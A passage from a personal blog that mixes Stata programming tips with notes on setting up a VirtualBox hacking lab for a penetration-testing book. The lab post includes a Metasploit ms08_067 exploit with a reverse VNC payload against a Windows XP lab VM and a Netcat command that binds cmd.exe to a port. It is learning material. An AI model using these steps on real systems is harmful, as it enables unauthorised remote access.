Else<br /> 'Debug.Print "re.test is false"<br /> End If<br /> <br /> destinationWorksheet.Range(cellAddress).Value = translateD<br /> Else<br /> destinationWorksheet.Range(cellAddress).Value = cell.Value<br /> End If<br /> Next<br /> <br />End Sub</span></div>
Shafique Jamalhttp://www.blogger.com/profile/04967937399790643577noreply@blogger.com13tag:blogger.com,1999:blog-2722671667390463266.post-77845040165938389242012-11-23T11:09:00.001-08:002012-11-23T15:51:51.284-08:00Stata Tutorial 3 is now up on youtube.com<div dir="ltr" style="text-align: left;" trbidi="on">
Stata Tutorial 3: insheet, append, use, sort, merge, outsheet. Here is the link to the youtube video:<br />
<br />
https://www.youtube.com/watch?v=8JA5nZPdqIk&feature=plcp<br />
<br />
The do file is available at:<br />
<br />
https://docs.google.com/document/d/1RouCrQOhxc9CoDs5XryY3RgUPP5r_j39_LanPKmGu3Q/edit<br />
<br />
and the log file is available at:<br />
<br />
https://docs.google.com/document/d/1nkFknJ7fOzbNiejM7SZi2LcLDsaYdrnd4__ZdYrgF8A/edit<br />
<br />
Enjoy!</div>
Shafique Jamalhttp://www.blogger.com/profile/04967937399790643577noreply@blogger.com2tag:blogger.com,1999:blog-2722671667390463266.post-43951766622985816172012-08-24T03:25:00.000-07:002012-12-03T00:17:33.982-08:00Stata tip: a wrapper for the outsheet command that can write variable lables instead of variable names<div dir="ltr" style="text-align: left;" trbidi="on">
One limitation of Stata's outsheet command is that it does not give you the option of writing variable labels instead of variable names on the first line. To solve this, I wrote an ado file that is a wrapper for the outsheet command:<br />
<br />
<div style="font-family: "Courier New",Courier,monospace;">
// This ado file is a wrapper for the outsheet stata command that allows one to put the variable labels instead of the variable names on the first line of the file.</div>
<div style="font-family: "Courier New",Courier,monospace;">
<br /></div>
<div style="font-family: "Courier New",Courier,monospace;">
program define outsheet_varlabels </div>
<div style="font-family: "Courier New",Courier,monospace;">
<br /></div>
<div style="font-family: "Courier New",Courier,monospace;">
syntax [varlist] using/ [,Comma DELIMiter(string) NONames NOLabel NOQuote replace VARLabels] </div>
<div style="font-family: "Courier New",Courier,monospace;">
</div>
<div style="font-family: "Courier New",Courier,monospace;">
// if no varlist, that means outsheet all variables</div>
<div style="font-family: "Courier New",Courier,monospace;">
if ("`varlist'"=="") {</div>
<div style="font-family: "Courier New",Courier,monospace;">
local varlist "*"</div>
<div style="font-family: "Courier New",Courier,monospace;">
} </div>
<div style="font-family: "Courier New",Courier,monospace;">
// Lets make sure that the delimiter is passed on to the outsheet command correctly. At the same time, I need the delimiter without quotes for the first line that I will write for the heading. </div>
<div style="font-family: "Courier New",Courier,monospace;">
if (`"`delimiter'"'~="") {</div>
<div style="font-family: "Courier New",Courier,monospace;">
local delimiterchar = `"`delimiter'"'</div>
<div style="font-family: "Courier New",Courier,monospace;">
local delimiter `"delimiter("`delimiter'")"'</div>
<div style="font-family: "Courier New",Courier,monospace;">
} </div>
<div style="font-family: "Courier New",Courier,monospace;">
else {</div>
<div style="font-family: "Courier New",Courier,monospace;">
local delimiterchar = `","'</div>
<div style="font-family: "Courier New",Courier,monospace;">
}</div>
<div style="font-family: "Courier New",Courier,monospace;">
// di `"new delimiter macro: `delimiter'"'</div>
<div style="font-family: "Courier New",Courier,monospace;">
// di `"delimiterchar = `delimiterchar'"'</div>
<div style="font-family: "Courier New",Courier,monospace;">
// Did the user say "noquote"? If not, then make sure the variable labels line below is double quoted</div>
<div style="font-family: "Courier New",Courier,monospace;">
if (`"`noquote'"'~="noquote") {</div>
<div style="font-family: "Courier New",Courier,monospace;">
local quote = `"""'</div>
<div style="font-family: "Courier New",Courier,monospace;">
// di `"use quotes: `quote'"'</div>
<div style="font-family: "Courier New",Courier,monospace;">
}</div>
<div style="font-family: "Courier New",Courier,monospace;">
if ("`varlabels'" == "") { // If user did not specify the variable labels option, then just call outsheet as is</div>
<div style="font-family: "Courier New",Courier,monospace;">
outsheet `varlist' using `"`using'"', `comma' `delimiter' `nonames' `nolabel' `noquote' `replace'</div>
<div style="font-family: "Courier New",Courier,monospace;">
} </div>
<div style="font-family: "Courier New",Courier,monospace;">
else { // Otherwise, write the variable lables instead of the variable names. Chose line1 to be variable labels</div>
<div style="font-family: "Courier New",Courier,monospace;">
</div>
<div style="font-family: "Courier New",Courier,monospace;">
tempfile tempoutsheetfile</div>
<div style="font-family: "Courier New",Courier,monospace;">
qui outsheet `varlist' using `"`tempoutsheetfile'"', `comma' `delimiter' `nonames' `nolabel' `noquotes' `replace'</div>
<div style="font-family: "Courier New",Courier,monospace;">
</div>
<div style="font-family: "Courier New",Courier,monospace;">
// Here, construct the first line</div>
<div style="font-family: "Courier New",Courier,monospace;">
local count = 0</div>
<div style="font-family: "Courier New",Courier,monospace;">
foreach var of varlist `varlist' {</div>
<div style="font-family: "Courier New",Courier,monospace;">
local varlabel : variable label `var'</div>
<div style="font-family: "Courier New",Courier,monospace;">
if (`"`varlabel'"'=="") { // What if there no variable label for the label? Then use the variable name instead</div>
<div style="font-family: "Courier New",Courier,monospace;">
local varlabel `"`var'"'</div>
<div style="font-family: "Courier New",Courier,monospace;">
}</div>
<div style="font-family: "Courier New",Courier,monospace;">
// di "var: `var'"</div>
<div style="font-family: "Courier New",Courier,monospace;">
local count = `count' + 1</div>
<div style="font-family: "Courier New",Courier,monospace;">
if (`count'==1) { // Don't want a comma before the first item.</div>
<div style="font-family: "Courier New",Courier,monospace;">
local line1heading `"`quote'`varlabel'`quote'"'</div>
<div style="font-family: "Courier New",Courier,monospace;">
// di `"`quote'`varlabel'`quote'"'</div>
<div style="font-family: "Courier New",Courier,monospace;">
}</div>
<div style="font-family: "Courier New",Courier,monospace;">
else {</div>
<div style="font-family: "Courier New",Courier,monospace;">
local line1heading `"`line1heading'`delimiterchar'`quote'`varlabel'`quote'"'</div>
<div style="font-family: "Courier New",Courier,monospace;">
// di `"`line1heading'`delimiterchar'`quote'`varlabel'`quote'"'</div>
<div style="font-family: "Courier New",Courier,monospace;">
}</div>
<div style="font-family: "Courier New",Courier,monospace;">
}</div>
<div style="font-family: "Courier New",Courier,monospace;">
// di `"`line1heading'"'</div>
<div style="font-family: "Courier New",Courier,monospace;">
// di ""</div>
<div style="font-family: "Courier New",Courier,monospace;">
</div>
<div style="font-family: "Courier New",Courier,monospace;">
/* // This method does not work. It overwrites, rather than inserts</div>
<div style="font-family: "Courier New",Courier,monospace;">
tempname fht</div>
<div style="font-family: "Courier New",Courier,monospace;">
file open `fht' using `"`using'"', read write t all</div>
<div style="font-family: "Courier New",Courier,monospace;">
file seek `fht' tof</div>
<div style="font-family: "Courier New",Courier,monospace;">
file write `fht' _n `"`line1heading'"' _n</div>
<div style="font-family: "Courier New",Courier,monospace;">
file close `fht'</div>
<div style="font-family: "Courier New",Courier,monospace;">
*/</div>
<div style="font-family: "Courier New",Courier,monospace;">
</div>
<div style="font-family: "Courier New",Courier,monospace;">
// Try open tempoutsheetfile as read, the final file as write with the line1heading as the first line</div>
<div style="font-family: "Courier New",Courier,monospace;">
// This is the final file</div>
<div style="font-family: "Courier New",Courier,monospace;">
tempname fh_write</div>
<div style="font-family: "Courier New",Courier,monospace;">
file open `fh_write' using `"`using'"', t write all replace</div>
<div style="font-family: "Courier New",Courier,monospace;">
file write `fh_write' `"`line1heading'"' _n</div>
<div style="font-family: "Courier New",Courier,monospace;">
</div>
<div style="font-family: "Courier New",Courier,monospace;">
// Read from this and put in the final file</div>
<div style="font-family: "Courier New",Courier,monospace;">
tempname fh_read</div>
<div style="font-family: "Courier New",Courier,monospace;">
file open `fh_read' using `"`tempoutsheetfile'"', t read </div>
<div style="font-family: "Courier New",Courier,monospace;">
</div>
<div style="font-family: "Courier New",Courier,monospace;">
file read `fh_read' readfileline</div>
<div style="font-family: "Courier New",Courier,monospace;">
local count = 0</div>
<div style="font-family: "Courier New",Courier,monospace;">
while r(eof)==0 {</div>
<div style="font-family: "Courier New",Courier,monospace;">
local count = `count' + 1</div>
<div style="font-family: "Courier New",Courier,monospace;">
if (`count'~=1) {</div>
<div style="font-family: "Courier New",Courier,monospace;">
file write `fh_write' `"`readfileline'"' _n</div>
<div style="font-family: "Courier New",Courier,monospace;">
}</div>
<div style="font-family: "Courier New",Courier,monospace;">
file read `fh_read' readfileline</div>
<div style="font-family: "Courier New",Courier,monospace;">
}</div>
<div style="font-family: "Courier New",Courier,monospace;">
</div>
<div style="font-family: "Courier New",Courier,monospace;">
file close `fh_write'</div>
<div style="font-family: "Courier New",Courier,monospace;">
file close `fh_read' </div>
<div style="font-family: "Courier New",Courier,monospace;">
</div>
<div style="font-family: "Courier New",Courier,monospace;">
}</div>
<div style="font-family: "Courier New",Courier,monospace;">
</div>
<div style="font-family: "Courier New",Courier,monospace;">
</div>
<div style="font-family: "Courier New",Courier,monospace;">
// di `"sytnax: `varlist' `using', `comma' `delimiter' `nonames' `nolabel' `noquotes' `replace'"'</div>
<div style="font-family: "Courier New",Courier,monospace;">
</div>
<div style="font-family: "Courier New",Courier,monospace;">
<br /></div>
<div style="font-family: "Courier New",Courier,monospace;">
end<br />
<br />
<span style="font-family: inherit;">To call this function so that it writes the variable labels instead of the variable names to the first line, call is just like you would the <span style="font-family: "Courier New", Courier, monospace;">outsheet<span style="font-family: inherit;"> command, but with the <span style="font-family: "Courier New", Courier, monospace;">varlabels<span style="font-family: inherit;"> option:</span></span></span></span></span><br />
<br />
<span style="font-family: "Courier New",Courier,monospace;">outsheet_varlabels </span><span style="font-family: inherit;">using filename.csv, c replace </span><span style="font-family: "Courier New",Courier,monospace;">varlabels</span></div>
</div>
Shafique Jamalhttp://www.blogger.com/profile/04967937399790643577noreply@blogger.com0tag:blogger.com,1999:blog-2722671667390463266.post-85884616434797917222012-06-04T21:54:00.001-07:002012-06-04T21:54:54.052-07:00Working through another hacking book<div dir="ltr" style="text-align: left;" trbidi="on">
I've pretty much finished with the hacking/penetration testing book by at Engebretson, and I've started another:<br />
<br />
<a href="http://www.amazon.com/gp/product/159327288X/ref=as_li_ss_tl?ie=UTF8&tag=ohmission-20&linkCode=as2&camp=1789&creative=390957&creativeASIN=159327288X" target="_blank">Metasploit: The Penetration Tester's Guide</a><br />
by Kennedy et al<br />
<br />
I'm still using Backtrack 5 R2. Here are some things I had to do in order to work through this book<br />
<br />
1. See <a href="http://teh-geek.com/?p=136" target="_blank">installing postgres-8.4</a> and <a href="https://help.ubuntu.com/10.04/serverguide/postgresql.html" target="_blank">changing the password for user postgres</a>. In Backtrack 5 R2, I had to install postgresql 8.4 (the book uses 8.3, but I think 8.4 will work just fine):<br />
<br />
apt-get install postgresql-8.4<br />
<br />
Then I had to change the password for the user <i>postgres</i> to <i>toor</i>:<br />
<br />
sudo -u postgres psql template1<br />
<pre class="screen"><span class="command"><strong>ALTER USER postgres with encrypted password 'toor';</strong></span></pre>
<pre class="screen"><span class="command"><strong> </strong></span></pre>
press Ctrl+shift+z to exit, and I think you should be all set. <br /><br /><br /><br />
<br />
<br /></div>Shafique Jamalhttp://www.blogger.com/profile/04967937399790643577noreply@blogger.com0tag:blogger.com,1999:blog-2722671667390463266.post-18284957164539728102012-05-28T06:46:00.003-07:002012-06-26T13:53:24.072-07:00Setting up a hacking lab (sandboxed environment) using virtualbox guest<div dir="ltr" style="text-align: left;" trbidi="on">
I've been working my way through a book on hacking and penetration testing:<br />
<br />
<a href="http://www.amazon.com/gp/product/1597496553/ref=as_li_ss_tl?ie=UTF8&tag=ohmission-20&linkCode=as2&camp=1789&creative=390957&creativeASIN=1597496553" target="_blank">The Basics of Hacking and Penetration Testing: Ethical Hacking and Penetration Testing Made Easy (Syngress Basics Series)</a><br />
<br />
Overall, it is a good read, and great for beginners like me. One shortcoming is that it doesn't tell you how to set up a hacking lab on your computer. That is, how to set up different operating systems running on virtual machines (like virtualbox), as an alternative to networking multiple physical machines. I struggled a bit to set up a hacking lab, so I thought I would post my notes here.<br />
<br />
Steps:<br />
<br />
1. Download Virtualbox (<a href="https://www.virtualbox.org/" target="_blank">https://www.virtualbox.org/</a>) for whatever operating system you are using. I started off using a Mac runnig snow leopard, but my Mac is old and can't handle much, so I switched to a PC running windows 7 with 8 GB ram (64 bit Machine), which I have available.<br />
<br />
2. Download Backtrack Linux (<a href="http://www.backtrack-linux.org/" target="_blank">http://www.backtrack-linux.org</a>) and make sure you follow the instruction at these two pages: <a href="http://www.backtrack-linux.org/wiki/index.php/VirtualBox_Install" target="_blank">http://www.backtrack-linux.org/wiki/index.php/VirtualBox_Install</a> and <a href="http://www.backtrack-linux.org/wiki/index.php/Install_BackTrack_to_Disk" target="_blank">http://www.backtrack-linux.org/wiki/index.php/Install_BackTrack_to_Disk</a><br />
<br />
One modification: AFTER installing backtrack but BEFORE installing virtualbox guest additions, do the following:<br />
<br />
apt-get update<br />
apt-get upgrade<br />
apt-get install dkms<br />
<br />
3. Download a couple of operating systems to use as targets to practice on (this is what is recommended in the book). Here are some options:<br />
- Windows XP, preferably with no service pack, or SP1. If you can only get SP2 or SP3, then fine.<br />
- Metasploitable (<a href="http://www.offensive-security.com/metasploit-unleashed/Metasploitable" target="_blank">http://www.offensive-security.com/metasploit-unleashed/Metasploitable</a>). This is the link to the torrent file.<br />
- Anything else you want to try. Windows 7 maybe? An older version of Ubuntu?<br />
<br />
4. Set up the "guest" virtual machines for these other operating systems similar to the way you installed backtrack linux and according to the <a href="https://www.virtualbox.org/wiki/Documentation" target="_blank">documentation</a> for Virtualbox. BUT, you should make one change to the default settings that the book and above resources (except the Virtualbox documentation) does not mention: For EACH guest machine, under "Settings" -> "Network" in the "Attached to:" field, select from the drop-down menu "Bridge Adapter" (instead of the default NAT). Then go ahead and start your guest machines.<br />
<br />
This will allow your machines to ping, nmap, etc. each other (note that if Windows XP firewall is enabled, then it won't reply to pings, nmap, etc.).<br />
<br />
Installing Win XP in a guest machine was pretty easy. The same is true for Metasploitable - once you know what to do, which is the following (after you have unzipped the metasploitable.zjip file):<br />
<br />
1. In the Virtualbox Manager (I'm using 4.1.16 r78094), click "New" then "Next"<br />
2. Enter a name for the virtual machine, e.g. metasploit<br />
3. Select the amount of memory, e.g. 512 MB and click next<br />
4. Leave Startup Disk checked, and select "Use Existing Hard Disk". Click the folder and navigate to the Metasploitable.vmdk file<br />
5. Click Open, then Create.<br />
<br />
Don't forget to change the Video memory to 64 MB (or 128 MB), and change the Network to Bridge Adapter.<br />
<br />
Also, the login credentials for Metasploitable are user: msfadmin, and password: msfadmin.<br />
<br />
UPDATE 1: There is a typo on page 34 of the book. "set type 5 mx" should instead be "set type = mx"<br />
<br />
UPDATE 2: Getting Nessus to work on Firefox running on Backtrack Linux 5 R2 was a pain - the official instructions at the backtrack wiki actually do not work for x64 - but I eventually got it working (for 32 bit, even on a 64 bit machine with BT 64 bit). Here is how (thanks to <a href="http://www.backtrack-linux.org/wiki/index.php/Install_Flash_Player" target="_blank">the backtrack wiki</a> and <a href="http://www.ethicalhacker.net/component/option,com_smf/Itemid,54/topic,8604.msg48011/" target="_blank">this post</a>). First follow the instructions at the <a href="http://www.backtrack-linux.org/wiki/index.php/Install_Flash_Player" target="_blank">backtrack wiki page with instructions to install flash player</a> ONLY TO REMOVE the existing flash installation on backtrack (if there is any). Don't do the rest yet:<br />
<br />
<pre>root@bt:~# <span style="color: red;">apt-get purge flashplugin-nonfree flashplugin-installer gnash gnash-common mozilla-plugin-gnash swfdec-mozilla</span>
root@bt:~# <span style="color: red;">rm -f /usr/lib/firefox/plugins/*flash*</span>
root@bt:~# <span style="color: red;">rm -f /usr/lib/firefox-addons/plugins/*flash*</span>
root@bt:~# <span style="color: red;">rm -f /usr/lib/mozilla/plugins/*flash*</span>
root@bt:~# <span style="color: red;">rm -f ~/.mozilla/plugins/*flash*so</span>
root@bt:~# <span style="color: red;">rm -rfd /usr/lib/nspluginwrapper</span></pre>
<br />
These instructions are fine. Now SKIP the part about installing for x64. Next, use the following commands to get the flash player and install the plug-in:<br />
<br />
<br />
<pre style="display: inline; margin-top: 0;">wget http://fpdownload.macromedia.com/get/flashplayer/pdc/11.1.102.63/install_flash_player_11_linux.i386.tar.gz
tar xvzf install_flash_player_11_linux.i386.tar.gz
mkdir ~/.mozilla/plugins
mv libflashplayer.so ~/.mozilla/plugins/</pre>
<br />
UPDATE 2a: now install nessus:<br />
<br />
apt-get install nessus<br />
<br />
You can add a user now (by typing at the prompt: /opt/nessus/sbin/nessus-adduser<br />) or later. Now register for an activation code at: <a href="http://www.nessus.org/products/nessus/nessus-plugins/obtain-an-activation-code" target="_blank">http://www.nessus.org/products/nessus/nessus-plugins/obtain-an-activation-code</a><br />
<br />
You will receive an activation code by email. Lets call this @activation_code@. Once you get it, run the following command (replacing @activation_code@ with your activation code - yes, replace the @ symbols too):<br />
<br />
/opt/nessus/bin/nessus-fetch --register @activation_code@<br />
<br />
UPDATE 3: To log into nessus, you will need to create a user account on nessus. To do so, open up the console and enter the following command:<br />
<br />
/opt/nessus/sbin/nessus-adduser<br />
<br />
UPDATE 3a: To start nessus, you must type at the command prompt:<br />
<br />
/opt/nessus/sbin/nessus-service -D<br />
<br />
after nessus processes the plug ins, it should be ready for starting. Note that we are using the 32 bit version (I don't know why the 64 bit
version doesn't work). Now you should be able to start firefox, navigate
to nessus (https://127.0.0.1:8834) and see a login screen.<br />
<br />
UPDATE 4: On page 72 of the book you, you are instructed to launch Metasploit using the following command:<br />
<br />
/pentest/exploits/framework3/msfconsole <br />
<br />
On backtrack linux R2 64 bit, this won't work. Instead you might use:<br />
<br />
/pentest/exploits/framework2/msfconsole<br />
<br />
This will launch the Metasploit, but there is another problem. On page 74 of the book, you are instructed to use the "search" command in Metasploit. It won't work - the search command is not supported. Instead, you need to update Metasploit. From the terminal, type:<br />
<br />
msfupdate<br />
<br />
(but FIRST, you might want to follow this advice at this link: <a href="http://www.backtrack-linux.org/forums/showthread.php?t=48556&p=216008" target="_blank">update Metasploit on Backtrack Linux R2</a>). This will take some time. After it is done, launch Metasploit:<br />
<br />
msfconsole<br />
<br />
And at the "<u>msf</u> > " prompt, check to see that you have the latest version:<br />
<br />
<u>msf</u> >version<br />
<br />
(just type <i>version</i> at the prompt). Now you should be able to use the search command in Metasploit.<br />
<br />
UPDATE 5: After following some instructions from the book, you'll start an exploit using the "exploit" command at the msf prompt. For example, I am practicing attaching a VirtualBox running Windows XP SP2, so after launching msfconsole, I did the following at the msf > prompt:<br />
<br />
use exploit/windows/smb/ms08_067_ntapi<br />
set payload windows/vncinject/reverse_tcp<br />
set RHOST 192..... (victim machine, i.e. win xp sp2 machine, ip address)<br />
set LHOST 192..... (attacker, i.e. backtrack linux machine, ipaddress)<br />
exploit<br />
<br />
Now you have access to the victim machine. But in your terminal, there is no prompt. Just go to the terminal and hit enter and you will get your msf > prompt back. There are no instructions in the book on how to stop the exploit, so I just type <i>quit</i> at the prompt and then relaunch msfconsole - that seems to do the trick.<br />
<br />
UPDATE 6: I'm trying to use Autopwn automation on Fast-track Web in Backtrack. When I select Autopwn automation from the web browser, the browser displays only HTML instead of a menu. I thought that the problem was with Java not being installed in firefox, so I followed <a href="http://www.backtrack-linux.org/wiki/index.php/Java_Install" target="_blank">these instructions</a> to intall/update the Java plugin in Firefox. That didn't solve the problem. Then I came across <a href="http://www.linux-backtrack.com/2012/03/fix-fast-track-after-metasploit-update-autopwn/" target="_blank">this post</a> which states that autopwn won't work after updating Metasploit, because the updating removes the db_autopwn file. So I followed <a href="http://www.linux-backtrack.com/2012/03/fix-fast-track-after-metasploit-update-autopwn/" target="_blank">those instructions</a> and downloaded a new db_autopwn file from the link that is available <a href="http://www.backtrack-linux.org/forums/showthread.php?t=48407" target="_blank">here</a>, placed it in /opt/metasploit/msf3/plugins, and then edited <b>autopwn.py</b> (you can find the directory using the command <i>find / -name autopwn.py</i>). I rebooted BT5 and still it didn't fix the issue. I then updated Fast Track by loading the Fast Track Interactive application from the kstart dragon and selecting update (1 on the menu). I even updated Firefox to the latest version. Still, Autopwn Automation doesn't work on the web GUI. I'll give up for now and just use Fast Track Interactive.<br />
<br />
UPDATE 7: Ok, forget Firefox. Autopwn Automation works fine if you access it using Konqueror. <br />
<br />
UPDATE 8: In case you want to transfer files between the host and the guest, you can to the following: on the host machine, click "Devices" -> "Shared Folders" -> "Transient Folders" -> click the green "Add Shared Folders (ins)" icon -> In folder path click the down arrow, select "other" and browse to the folder you want to select, then click "ok". <a href="http://www.techgaun.com/2010/11/accessing-shared-folders-of-host-system.html" target="_blank">Then in a Terminal in the guest, you can type</a>:<br />
<br />
mount -t vboxsf <i>name_of_the_folder_you_shared</i> /mnt<br />
<br />
<i>name_of_the_folder_you_shared </i>is the name of the folder that you shared as it appears under "Transient Folders" in the Shared Folders folder of the Settings box. (The command I used is:<br />
<br />
mount -t vboxsf shareme /mnt<br />
<br />
because I shared a folder called "shareme") <br />
<br />
That folder will now appear in the /mnt directory<br />
<br />
UPDATE 9: Getting Webgoat running on BackTrack Linux was a huge pain. <a href="http://mimmoo.wordpress.com/2011/06/22/how-to-install-webgoat-on-backtrack-5/" target="_blank">This link helped,</a> and so did <a href="https://code.google.com/p/webgoat/wiki/FAQ" target="_blank">this link</a>. Here is what I did:<br />
<br />
1. Open up a terminal, and update everything in sight:<br />
apt-get update<br />
apt-get upgrade<br />
<br />
2. If you don't have the Java stuff installed, then install it. While you're at it, install p7zip:<br />
apt-get install p7zip<br />
apt-get install openjdk-6-jre openjdk-6-jdk<br />
<br />
3. Extract the files, then move them, and make the .sh file executable:<br />
p7zip -d OWASP_Standard WebGoat-5.3_RC1.7z<br />
mkdir /pentest/web/webgoat<br />
mv WebGoat-5.3_RC1/* /pentest/web/webgoat/<br />
chmod +x /pentest/web/webgoat/webgoat.sh <br />
<br />
4. At this point, you need to rename a file:<br />
cd /pentest/web/webgoat/tomcat/webapps<br />
mv webgoat.war WebGoat.war<br />
cd /pentest/web/webgoat<br />
<br />
(note that you need to be in the /pentest/web/webgoat directory for webgoat to run properly; this is because of the way the paths are defined in the webgoat.sh file)<br />
<br />
5. Now start webgoat:<br />
/pentest/web/webgoat/webgoat.sh start80 (or start8080)<br />
<br />
6. open up a browser and go to: http://127.0.0.1/WebGoat/attack (or http://127.0.0.1:8080/WebGoat/attack) and log in with:<br />
user: guest<br />
password: guest<br />
<br />
UPDATE #10: There is a mistake on page 133, in the section on using Netcat:<br />
<br />
meterpreter > nc –L –p 5777 –e cmd.exe<br />
<br />
should be instead:<br />
<br />
meterpreter > execute -f "nc.exe –L –p 5777 –e cmd.exe"<br />
<br />
More hints and advice to come, hopefully. </div>Shafique Jamalhttp://www.blogger.com/profile/04967937399790643577noreply@blogger.com2tag:blogger.com,1999:blog-2722671667390463266.post-74083549684606727722012-05-14T23:55:00.002-07:002012-05-17T21:48:16.510-07:00An easy way to conduct f-tests on regression coefficients<div dir="ltr" style="text-align: left;" trbidi="on">
Suppose you want to conduct a joint test for significance on coefficients of variables that have been expanded in a regression using the xi command. For example suppose you ran the command:<br />
<br />
xi: svy, subpop(rual) : y i.lfs i.roofmat var5 var6 var7 var8<br />
<br />
doing an f-test manually on the each of the expanded variables would involve typing (or copying and pasting) the expanded variables, something like:<br />
<br />
test _Ilfs_2 _Ilfs_3 _Ilfs_5 _Ilfs_6 _Ilfs_10<br />
test _Iroofmat_2 _Iroofmat_5 _Iroofmat_6 _Iroofmat_7 _Iroofmat_8<br />
<br />
As you can see, the numbers on the xi expanded variables do not necessarily increase by one. And this can be cumbersome to type out, or copy and paste, especially if you have many such categorical variables. I'm sure someone has solved this already, but I couldn't find a solution through a web search, so I made my own.<br />
<br />
The following program, which you would run after running the reg command, will automatically run f-tests on each group of xi expanded categorical variables. So you would use this program as follows:<br />
<br />
xi: svy, subpop(rual) : y i.lfs i.roofmat var5 var6 var7 var8<br />
easyftest <br />
<br />
To use this, just copy the program below and save it as an .ado file in your Stata path to your personal programs directory. The filename should be "easyftest.ado". Let me know if you have any trouble with it. Good luck!<br />
<br />
program define easyftest<br />
<br />
local xivars "`_dta[__xi__Vars__To__Drop__]:'"<br />
local word1 : word 1 of `xivars'<br />
local pattern = regexr("`word1'","_[0-9]+$","_")<br />
// di "word1 = `word1'"<br />
// di "pattern = `pattern'"<br />
local ftestvars1 "`word1'"<br />
local count = 0<br />
local ftestcount 1<br />
foreach var of local xivars { <br />
local count = `count' + 1<br />
if (`count' != 1) {<br />
local w : word `count' of `xivars'<br />
// di "w: `w'"<br />
// check to see whether the next variable is to be included in this list of f-test variables<br />
if (regexm("`w'","^`pattern'[0-9]+$")) { // there is a match - add this to this list of ftest variables<br />
// di "pattern match!"<br />
local ftestvars`ftestcount' "`ftestvars`ftestcount'' `w'"<br />
// di "ftestvars`ftestcount' : `ftestvars`ftestcount''"<br />
} <br />
else { // no match, create a new list of f-test variables, add this variable to it as the first element, and replace the pattern<br />
local ftestcount = `ftestcount' + 1<br />
local ftestvars`ftestcount' "`w'"<br />
local pattern = regexr("`w'","_[0-9]+$","_")<br />
}<br />
}<br />
}<br />
<br />
forv k = 1/`ftestcount' { // Do all the ftest<br />
// di "ftestvars`k' : `ftestvars`k''"<br />
// return local ftestvars`k' `ftestvars`k''<br />
test `ftestvars`k''<br />
}<br />
// return scalar N = `ftestcount'<br />
<br />
end</div>Shafique Jamalhttp://www.blogger.com/profile/04967937399790643577noreply@blogger.com0tag:blogger.com,1999:blog-2722671667390463266.post-3663042474269513642012-05-14T10:33:00.001-07:002012-05-14T21:09:43.381-07:00Stata tip: Plotting the coefficients estimated from a regression (bar graph in stata)<div dir="ltr" style="text-align: left;" trbidi="on">
Suppose you want to make a bar chart/graph/plot of the coefficients (betas) that are returned in the ereturn list from the regression (reg) command. You might want to do this if you want to visualize the relative weight the coefficients give to your estimation. For example, suppose you want to predict consumption based on the assets: car, satellite dish, generator, household size (e.g. if you are working on a Proxy Means Test (PMT) formula). Assume the first three are dummy/binary indicators. <br />
<br />
The coefficients estimated from the regression will give you an indication how important each factor is. For example, if the coefficients are, respectively: +5, +1, +3, -15, then you know that the household size dominates the calculation: an additional member reduces predicted consumption more than having all the other assets increases it.<br />
<br />
Here is some code for a program (.ado file) that you can call after running the reg command that will create a dataset with the variables in the regression (including the constant) and one observation for each variable, which is the coefficient (see more text after the code below. Yes I know this code is horribly inefficiently written, I just wanted something quick, which means I got something quick and dirty):<br />
<br />
program define dataset_coefficients<br /> <br /> syntax , Filename(string) [Separator(string)]<br /> version 9.1<br /> if ("`separator'" == "") { <br /> local separator ","<br /> }<br /> // Get the names of the variables to write out. Need to change " o." to " " for making name for the macro to hold the variable labels<br /> local varnames : coln e(b)<br /> local coefs ""<br /> foreach varn of local varnames {<br /> local coef = _coef[`varn']<br /> local coefs "`coefs' `coef'"<br /> local varn1 = regexr("`varn'","o._I","_I")<br /> if ("`varn'" != "_cons") {<br /> local varlab_`varn1' : variable label `varn1'<br /> }<br /> else {<br /> local varlab_constant "constant"<br /> }<br /> }<br /> preserve<br /> drop *<br /> // Generate the new variable names, and apply the labels<br /> local variablenamestoplot ""<br /> foreach varn of local varnames {<br /> local varn1 = regexr("`varn'","o._I","_I")<br /> if ("`varn'" != "_cons") {<br /> gen `varn1' = .<br /> label var `varn1' `"`varlab_`varn1''"'<br /> local variablenamestoplot "`variablenamestoplot' `varn1'"<br /> }<br /> else {<br /> gen constant = .<br /> label var constant "constant"<br /> local variablenamestoplot "`variablenamestoplot' `constant'"<br /> }<br /> }<br /> // Apply the values to the variables as observations<br /> set obs 1<br /> local count = 0<br /> foreach varn of local varnames {<br /> local count = `count' + 1<br /> local coef1 : word `count' of `coefs'<br /> local varn1 = regexr("`varn'","o._I","_I")<br /> if ("`varn'" != "_cons") {<br /> // constant? <br /> replace `varn1' = `coef1' in 1<br /> }<br /> else {<br /> replace constant = `coef1' in 1<br /> }<br /> }<br /> cap drop __*<br /> // global variablenamestoplot "`variablenamestoplot'"<br /> // char [variablenamestoplot] "`variablenamestoplot'"<br /> notes : `variablenamestoplot'<br /> save "`filename'" , replace<br /> restore<br />end program<br />
<br />
After calling this, you can simply load the dataset and graph/chart/plot
the coefficients on a bar graph using the following command:<br />
<br />
use plotme.dta, clear<br />
// get the list of variables. I can't just use * because I get some error like __00000 not found. And I don't want to plot the constant.<br />
local listofvars ""<br />
foreach var of varlist * {<br /> if ("`var'" != "constant") {<br /> local listofvars "`listofvars' `var'"<br /> }<br />
}<br />
graph bar (asis) `listofvars', blabel(name, pos(outside) orient(vertical)) legend(off) title("Coefficients ")<br />
graph export coef.png, replace <br />
<br />
Let me know how this works for you.</div>Shafique Jamalhttp://www.blogger.com/profile/04967937399790643577noreply@blogger.com3tag:blogger.com,1999:blog-2722671667390463266.post-59057699479704559742012-05-08T01:38:00.003-07:002012-05-09T00:01:42.195-07:00Constructing the regression equation with actual coefficients/betas from the e(b) matrix from the ereturn list after running reg with xi and svy<div dir="ltr" style="text-align: left;" trbidi="on">
I hope that the title to this post hit all the keywords. So here was
my dilema: after running the reg command to estimate regression
coefficients (betas), I wanted to apply this equation to a different set
of data without having to copy and paste the actual beta hats. <br />
<br />
So I have a dataset, hhsurvey.dta, and I estimate the following regression<br />
<br />
y = b0 +b1*X1 + b2*X2 + ... bn*Xn<br />
<br />
and I get<br />
<br />
y_hat<br />
b0_hat<br />
b1_hat<br />
.<br />
.<br />
.<br />
bn_hat<br />
<br />
With
this, I want to take a different dataset, applicants.dta, with the same
variables (but of course different values for these variables), and I
want to predict y for the observations in applicants.dta:<br />
<br />
y_hat_2 = b0_hat +b1_hat*X1 + b2_hat*X2 + ... bn_hat*Xn<br />
<br />
I
could copy and paste the beta_hats from the regression outputs, but
this it painful to do even once (I am using many variables because I am
using many including categorical variables). Any I suspect I will have
to do this many times. My solution was to take the output of the e(b)
matrix, which has all the information necessary. After running the
regression command:<br />
<br />
